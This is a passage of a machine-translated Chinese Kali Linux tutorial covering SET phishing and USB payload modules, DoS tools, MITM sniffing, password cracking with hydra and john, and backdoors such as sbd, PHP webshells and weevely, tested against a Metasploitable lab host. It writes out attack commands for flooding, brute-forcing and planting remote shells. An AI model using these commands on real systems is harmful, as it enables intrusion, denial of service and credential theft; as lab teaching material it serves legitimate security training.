→輸入。將打開一個(gè)子菜單。如果您再次按下Enter按鈕,您將看到每個(gè)子菜單的說明。魚叉式網(wǎng)絡(luò)釣魚模塊允許您專門制作電子郵件消息,并將它們發(fā)送給您的目標(biāo)受害者,并附上FileFormatmalicious負(fù)載。例如,發(fā)送惡意PDF文檔,如果受害者打開該文檔,就會(huì)危及系統(tǒng)。如果您想欺騙您的電子郵件地址,請(qǐng)確保安裝了“Sendmail”(apt-getinstallsendmail)并將config/set_configSENDMAIL=OFF標(biāo)志更改為SENDMAIL=ON。魚叉式網(wǎng)絡(luò)釣魚攻擊有兩種選擇-執(zhí)行群發(fā)電子郵件攻擊創(chuàng)建FileFormat負(fù)載和社會(huì)工程模板第一個(gè)是讓SET為你做所有事情(選項(xiàng)1),第二個(gè)是創(chuàng)建你自己的FileFormat有效載荷并在你自己的攻擊中使用它。輸入“99”返回主菜單,然后輸入“2”轉(zhuǎn)到“Thewebattackvectors”。Web攻擊模塊是利用多種基于Web的攻擊來危害目標(biāo)受害者的獨(dú)特方式。如果受害者單擊鏈接,則通過對(duì)受害者執(zhí)行網(wǎng)絡(luò)釣魚攻擊來使用此模塊。一旦他們點(diǎn)擊一個(gè)鏈接,就會(huì)發(fā)生各種各樣的攻擊。輸入“99”返回主菜單,然后輸入“3”。感染性USB/CD/DVD模塊將創(chuàng)建一個(gè)autorun.inf文件和一個(gè)Metasploit負(fù)載。負(fù)載和自動(dòng)運(yùn)行文件被刻錄或復(fù)制到USB上。當(dāng)DVD/USB/CD插入受害者的機(jī)器時(shí),它會(huì)觸發(fā)自動(dòng)運(yùn)行功能(如果啟用了自動(dòng)運(yùn)行)并有可能危及系統(tǒng)。您可以選擇要使用的攻擊向量:文件格式錯(cuò)誤或直接可執(zhí)行文件。以下是傳染性媒體生成器的選項(xiàng)。文件格式漏洞利用標(biāo)準(zhǔn)Metasploit可執(zhí)行文件輸入“99”返回主菜單。然后,鍵入“4”轉(zhuǎn)到“Web攻擊向量”。創(chuàng)建有效負(fù)載和偵聽器是創(chuàng)建Metasploit有效負(fù)載的簡(jiǎn)單方法。它將為您導(dǎo)出exe文件并生成一個(gè)偵聽器。您需要說服受害者下載exe文件并執(zhí)行它以獲取shell。輸入“99”返回主菜單,然后輸入“5”轉(zhuǎn)到“Thewebattackvectors”。群發(fā)郵件攻擊將允許您向受害者發(fā)送多封電子郵件并自定義消息。群發(fā)郵件程序有兩個(gè)選項(xiàng);第一種是向單個(gè)電子郵件地址發(fā)送電子郵件。第二個(gè)選項(xiàng)允許您導(dǎo)入一個(gè)包含所有收件人電子郵件的列表,它會(huì)將您的消息發(fā)送給該列表中任意數(shù)量的人。電子郵件攻擊單個(gè)電子郵件地址電子郵件攻擊群發(fā)郵件程序輸入“99”返回主菜單,然后輸入“9”進(jìn)入“PowershellAttackVector”。Powershell攻擊向量模塊允許您創(chuàng)建特定于PowerShell的攻擊。這些攻擊允許您使用PowerShell,它在WindowsVista及更高版本的所有操作系統(tǒng)中默認(rèn)可用。PowerShell為部署有效負(fù)載和執(zhí)行不會(huì)被預(yù)防技術(shù)觸發(fā)的功能提供了一個(gè)富有成效的環(huán)境。Powershell字母數(shù)字Shellcode注入器Powershell反向ShellPowershell綁定外殼Powershell轉(zhuǎn)儲(chǔ)SAM數(shù)據(jù)庫(kù)9、KaliLinux-壓力工具壓力工具用于創(chuàng)建DoS攻擊或?yàn)椴煌膽?yīng)用程序創(chuàng)建壓力測(cè)試,以便為將來采取適當(dāng)?shù)拇胧?。所有壓力測(cè)試工具都可以在應(yīng)用程序→02-漏洞分析→壓力測(cè)試中找到。所有壓力測(cè)試測(cè)試都將在IP為02的metsploitable機(jī)器上完成慢速測(cè)試Slowhttptest是DoS攻擊工具之一。它特別使用HTTP協(xié)議與服務(wù)器連接并保持CPU和RAM等資源繁忙。讓我們?cè)敿?xì)看看如何使用它并解釋它的功能。要打開slowhttptest,首先打開終端并輸入“slowhttptest–parameters”。您可以鍵入“slowhttptest–h”來查看您需要使用的所有參數(shù)。如果您收到輸出,“未找到命令”,您必須首先鍵入“apt-getinstallslowhttptest”。然后在安裝之后,再次輸入slowhttptest–h輸入以下命令-slowhttptest-c500-H-g-ooutputfile-i10-r200-tGET–u02/index.php-x24-p2在哪里,(-c500)=500個(gè)連接(-H)
=Slowloris模式-g
=生成統(tǒng)計(jì)信息-ooutputfile
=輸出文件名-i10
=使用10秒等待數(shù)據(jù)-r200
=200個(gè)連接與-tGET=GET請(qǐng)求-u02/index.php
=目標(biāo)網(wǎng)址-x24
=最大長(zhǎng)度為24字節(jié)-p2
=2秒超時(shí)測(cè)試開始后,輸出將如以下屏幕截圖所示,您可以在其中注意到該服務(wù)可用。一段時(shí)間后,在287連接處服務(wù)中斷。這意味著服務(wù)器最多可以處理287個(gè)HTTP連接。邀請(qǐng)洪水Inviteflood是通過UDP/IP泛洪的SIP/SDPINVITE消息。它在各種Linux發(fā)行版上執(zhí)行。它通過發(fā)送多個(gè)INVITE請(qǐng)求對(duì)SIP設(shè)備進(jìn)行DoS(拒絕服務(wù))攻擊。要打開Inviteflood,首先打開終端并輸入“inviteflood–parameters”如需幫助,您可以使用“inviteflood–h”接下來,您可以使用以下命令-invitefloodeth0target_extensiontarget_domaintarget_ipnumber_of_packets在哪里,target_extension是2000target_domain是192.168.xxtarget_ip是192.168.xxnumber_of_packets為1-a是SIP賬號(hào)的別名洪水Iaxflood是一種VoIPDoS工具。要打開它,請(qǐng)?jiān)诮K端中鍵入“iaxfloodsourcenamedestinationnamenumpackets”。要知道如何使用,輸入“iaxflood–h”thc-ssl-dosTHC-SSL-DOS是一個(gè)驗(yàn)證SSL性能的工具。建立安全的SSL連接需要在服務(wù)器上比在客戶端上多15倍的處理能力。THCSSL-DOS通過使服務(wù)器過載并將其從Internet上關(guān)閉來利用此不對(duì)稱屬性。以下是命令-thc-ssl-dosvictimIPhttpsport–accept在這個(gè)例子中,它將是-thc-ssl-dos443–accept它的輸出如下-10、KaliLinux-嗅探和欺騙嗅探工具的基本概念就像竊聽一樣簡(jiǎn)單,KaliLinux有一些用于此目的的流行工具。在本章中,我們將了解Kali中可用的嗅探和欺騙工具。打嗝套裝Burpsuite可以用作瀏覽器和網(wǎng)絡(luò)服務(wù)器之間的嗅探工具,以查找網(wǎng)絡(luò)應(yīng)用程序使用的參數(shù)。要打開Burpsuite,請(qǐng)轉(zhuǎn)到應(yīng)用程序→Web應(yīng)用程序分析→burpsuite。為了設(shè)置嗅探,我們將burpsuite配置為充當(dāng)代理。為此,請(qǐng)轉(zhuǎn)到選項(xiàng),如以下屏幕截圖所示。如圖所示選中該框。在這種情況下,代理IP將為,端口為8080。然后配置瀏覽器代理就是burpsuite機(jī)器的IP和端口。要開始攔截,請(qǐng)轉(zhuǎn)到代理→攔截→單擊“攔截已開啟”。繼續(xù)在要查找參數(shù)的網(wǎng)頁(yè)上導(dǎo)航以進(jìn)行漏洞測(cè)試。在這種情況下,它是IP為02的可元攻擊機(jī)器轉(zhuǎn)到“HTTP歷史記錄”。在下面的屏幕截圖中,紅色箭頭標(biāo)記的行顯示了最后一個(gè)請(qǐng)求。在Raw中,SessionID等隱藏參數(shù)以及用戶名和密碼等其他參數(shù)已用紅色下劃線標(biāo)出。中間代理mitmproxy是一個(gè)支持SSL的中間人HTTP代理。它提供了一個(gè)控制臺(tái)界面,允許即時(shí)檢查和編輯流量。要打開它,請(qǐng)轉(zhuǎn)到終端并輸入“mitmproxy-parameter”,要獲得有關(guān)命令的幫助,請(qǐng)輸入“mitmproxy–h”。要啟動(dòng)mitmproxy,請(qǐng)鍵入“mitmproxy–pportnumber”。在這種情況下,它是“mitmproxy–p80”。線鯊Wireshark是最好的數(shù)據(jù)包分析器之一。它深入分析幀級(jí)別的數(shù)據(jù)包。您可以從其官方網(wǎng)頁(yè)獲得有關(guān)Wireshark的更多信息:https
:///。在Kali中,可以使用以下路徑找到它-Applications→Sniffing&Spoofing→wireshark。單擊wireshark后,將打開以下GUI。點(diǎn)擊“Start”開始抓包,如下圖所示。sslstripsslstrip是一種MITM攻擊,它迫使受害者的瀏覽器通過HTTP以純文本形式進(jìn)行通信,并且代理修改來自HTTPS服務(wù)器的內(nèi)容。為此,sslstrip正在“剝離”https://URL并將它們轉(zhuǎn)換為http://URL。要打開它,請(qǐng)轉(zhuǎn)到應(yīng)用程序→09-嗅探和欺騙→欺騙和MITM→sslstrip。要設(shè)置它,寫入將所有80端口通信轉(zhuǎn)發(fā)到8080。然后,為所需的端口啟動(dòng)sslstrip命令。11、KaliLinux-密碼破解工具在本章中,我們將了解KaliLinux中使用的重要密碼破解工具。九頭蛇Hydra是一個(gè)登錄破解器,支持多種協(xié)議攻擊(CiscoAAA、Ciscoauth、Ciscoenable、CVS、FTP、HTTP(S)-FORM-GET、HTTP(S)-FORM-POST、HTTP(S)-GET、HTTP(S)-HEAD、HTTP-Proxy、ICQ、IMAP、IRC、LDAP、MS-SQL、MySQL、NNTP、OracleListener、OracleSID、PC-Anywhere、PC-NFS、POP3、PostgreSQL、RDP、Rexec、Rlogin、Rsh、SIP、SMB(NT)、SMTP、SMTP枚舉、SNMPv1+v2+v3、SOCKS5、SSH(v1和v2)、SSHKEY、Subversion、Teamspeak(TS2)、Telnet、VMware-Auth、VNC和XMPP).要打開它,請(qǐng)轉(zhuǎn)到應(yīng)用程序→密碼攻擊→在線攻擊→hydra。它將打開終端控制臺(tái),如以下屏幕截圖所示。在這種情況下,我們將暴力破解具有IP01的metasploitable機(jī)器的FTP服務(wù)我們?cè)贙ali中創(chuàng)建了一個(gè)單詞列表,擴(kuò)展名為“l(fā)st”,路徑為usr\share\wordlist\metasploit。命令如下-hydra-l/usr/share/wordlists/metasploit/user-P/usr/share/wordlists/metasploit/passwords01–V其中-V是嘗試時(shí)的用戶名和密碼如下截圖所示,找到用戶名和密碼為msfadmin:msfadmin約翰尼Johnny是JohntheRipper密碼破解工具的GUI。一般用于弱口令。要打開它,請(qǐng)轉(zhuǎn)到應(yīng)用程序→密碼攻擊→johnny。在這種情況下,我們將使用以下命令獲取Kali機(jī)器的密碼,并在桌面上創(chuàng)建一個(gè)文件。單擊“打開密碼文件”→確定,所有文件將顯示如下圖所示。點(diǎn)擊“開始攻擊”。攻擊完成后,點(diǎn)擊左側(cè)面板中的“密碼”,密碼將被取消。約翰john是JohnnyGUI的命令行版本。要啟動(dòng)它,請(qǐng)打開終端并輸入“john”。在取消隱藏密碼的情況下,我們需要編寫以下命令-root@kali:~#unshadowpasswdshadow>unshadowed.txt彩虹裂紋RainbowCrack軟件通過彩虹表查找來破解哈希。彩虹表是存儲(chǔ)在硬盤上的普通文件。Rainbowtables一般都是在網(wǎng)上買的,或者可以用不同的工具自己編譯。要打開它,請(qǐng)轉(zhuǎn)到應(yīng)用程序→密碼攻擊→單擊“rainbowcrack”。破解哈希密碼的命令是-rcrackpath_to_rainbow_tables-fpath_to_password_hashSQLdict它是一個(gè)針對(duì)SQLServer的字典攻擊工具,使用起來非常簡(jiǎn)單和基礎(chǔ)。要打開它,請(qǐng)打開終端并輸入“sqldict”。它將打開以下視圖。在“目標(biāo)IP服務(wù)器”下,輸入保存SQL的服務(wù)器的IP。在“目標(biāo)帳戶”下,輸入用戶名。然后使用密碼加載文件并單擊“開始”直到完成。哈希標(biāo)識(shí)符它是一種用于識(shí)別哈希類型的工具,即它們的用途。例如,如果我有一個(gè)HASH,它可以告訴我它是Linux還是windowsHASH。上面的屏幕顯示它可以是一個(gè)MD5哈希,它似乎是一個(gè)域緩存憑證。12、KaliLinux-維護(hù)訪問在本章中,我們將看到Kali用來保持連接和訪問被黑機(jī)器的工具,即使它再次連接和斷開連接也是如此。權(quán)謀這是一個(gè)適用于Windows機(jī)器的工具。它在受害者機(jī)器上安裝了PowerShell。該工具幫助黑客通過PowerShell連接到受害者的機(jī)器。要打開它,請(qǐng)打開左側(cè)的終端并鍵入以下命令以進(jìn)入powersploit文件夾-cd/usr/share/powersploit/如果你輸入“l(fā)s”,它會(huì)列出你獲得訪問權(quán)限后可以下載并安裝在受害者機(jī)器上的所有powersploit工具。大部分都是根據(jù)名字自解自明。在受害者機(jī)器上下載此工具的一種簡(jiǎn)單方法是創(chuàng)建一個(gè)Web服務(wù)器,powersploit工具允許使用以下命令輕松創(chuàng)建該服務(wù)器-python-mSimpleHTTPServer在此之后,如果您輸入:http://<Kalimachineip_address>:8000/以下是結(jié)果。SBDsbd是一個(gè)類似于Netcat的工具。它是可移植的,可以在Linux和Microsoft機(jī)器上使用。sbdfeaturesAES-CBC-128+HMAC-SHA1encryption>基本上,它有助于在特定端口上隨時(shí)連接到受害者的機(jī)器并遠(yuǎn)程發(fā)送命令。要打開它,請(qǐng)轉(zhuǎn)到終端并鍵入“sbd-l-pport”讓服務(wù)器接受連接。在這種情況下,讓我們將端口44放在服務(wù)器將偵聽的位置。在受害者的站點(diǎn)上,鍵入“sbdIPofserverport”。將建立一個(gè)連接,我們可以在其中發(fā)送遠(yuǎn)程命令。在本例中,它是“l(fā)ocalhost”,因?yàn)槲覀冊(cè)谕慌_(tái)機(jī)器上執(zhí)行了測(cè)試。最后,您將在服務(wù)器上看到已建立連接,如以下屏幕截圖所示。網(wǎng)殼Webshel??l可用于維護(hù)訪問或破解網(wǎng)站。但其中大多數(shù)都被防病毒軟件檢測(cè)到。C99phpshell在防病毒軟件中非常有名。任何常見的防病毒軟件都可以輕松地將其檢測(cè)為惡意軟件。通常,它們的主要功能是通過Web界面發(fā)送系統(tǒng)命令。要打開它,請(qǐng)?jiān)诮K端中輸入“cd/usr/share/webshel??ls/”。如您所見,它們根據(jù)編程語言分為幾類:asp、aspx、cfm、jsp、perl、php如果進(jìn)入php文件夾,可以看到所有php網(wǎng)頁(yè)的webshel??l。要將shell上傳到Web服務(wù)器,例如“simple-backdoor.php”,請(qǐng)打開webshell的網(wǎng)頁(yè)和URL。最后寫cmd命令。您將獲得如以下屏幕截圖所示的所有信息。威利Weevely是一個(gè)模擬telnet連接的PHPwebshell。它是一種用于Web應(yīng)用程序后期開發(fā)的工具,可以用作隱形后門或Webshell來管理合法的Web帳戶,甚至是免費(fèi)托管帳戶。要打開它,請(qǐng)轉(zhuǎn)到終端并鍵入“weevely”,您可以在其中看到它的用法。要生成shell,請(qǐng)鍵入“weevelygeneratepasswordpathofffile”。如以下屏幕截圖所示,它是在“桌面”文件夾中生成的,文件將上傳到網(wǎng)絡(luò)服務(wù)器以獲取訪問權(quán)限。如下圖所示上傳webshell后,我們可以使用命令“weevelyURLpassword”通過cmd連接到服務(wù)器,您可以看到會(huì)話已經(jīng)啟動(dòng)。http隧道http-tunnel創(chuàng)建一個(gè)在HTTP請(qǐng)求中隧道傳輸?shù)碾p向虛擬數(shù)據(jù)流。如果需要,可以通過HTTP代理發(fā)送請(qǐng)求。這對(duì)于限制性防火墻后面的用戶很有用。如果允許通過HTTP代理訪問WWW,則可以使用http隧道和telnet或PPP
溫馨提示
- 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請(qǐng)下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請(qǐng)聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁(yè)內(nèi)容里面會(huì)有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
- 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫(kù)網(wǎng)僅提供信息存儲(chǔ)空間,僅對(duì)用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對(duì)用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對(duì)任何下載內(nèi)容負(fù)責(zé)。
- 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請(qǐng)與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對(duì)自己和他人造成任何形式的傷害或損失。
最新文檔
- 精準(zhǔn)營(yíng)養(yǎng)在腫瘤輔助治療中的角色
- 精準(zhǔn)職業(yè)病防控:個(gè)體化風(fēng)險(xiǎn)評(píng)估
- 精準(zhǔn)治療中的基因數(shù)據(jù)知情同意
- 精準(zhǔn)醫(yī)療質(zhì)量評(píng)價(jià)的國(guó)際標(biāo)準(zhǔn)比較研究
- 精準(zhǔn)醫(yī)療時(shí)代的健康傳播策略創(chuàng)新
- 精準(zhǔn)醫(yī)療數(shù)據(jù)治理的多元共治模式
- 精準(zhǔn)醫(yī)療投融資的個(gè)體隱私與群體利益
- 精準(zhǔn)醫(yī)療與醫(yī)療保險(xiǎn)支付模式創(chuàng)新
- 茶酒會(huì)所的運(yùn)營(yíng)方案
- 集中制冷運(yùn)營(yíng)方案
- 湖北省荊州市八縣市2023-2024學(xué)年高二上學(xué)期期末考試物理試卷
- GB/T 15231-2023玻璃纖維增強(qiáng)水泥性能試驗(yàn)方法
- ESC2023年心臟起搏器和心臟再同步治療指南解讀
- 五年級(jí)上冊(cè)道德與法治期末測(cè)試卷推薦
- 超額利潤(rùn)激勵(lì)
- GB/T 2624.1-2006用安裝在圓形截面管道中的差壓裝置測(cè)量滿管流體流量第1部分:一般原理和要求
- 蘭渝鐵路指導(dǎo)性施工組織設(shè)計(jì)
- CJJ82-2019-園林綠化工程施工及驗(yàn)收規(guī)范
- 小學(xué)三年級(jí)閱讀練習(xí)題《鴨兒餃子鋪》原文及答案
- 六宮格數(shù)獨(dú)100題
- 廚房設(shè)施設(shè)備檢查表
評(píng)論
0/150
提交評(píng)論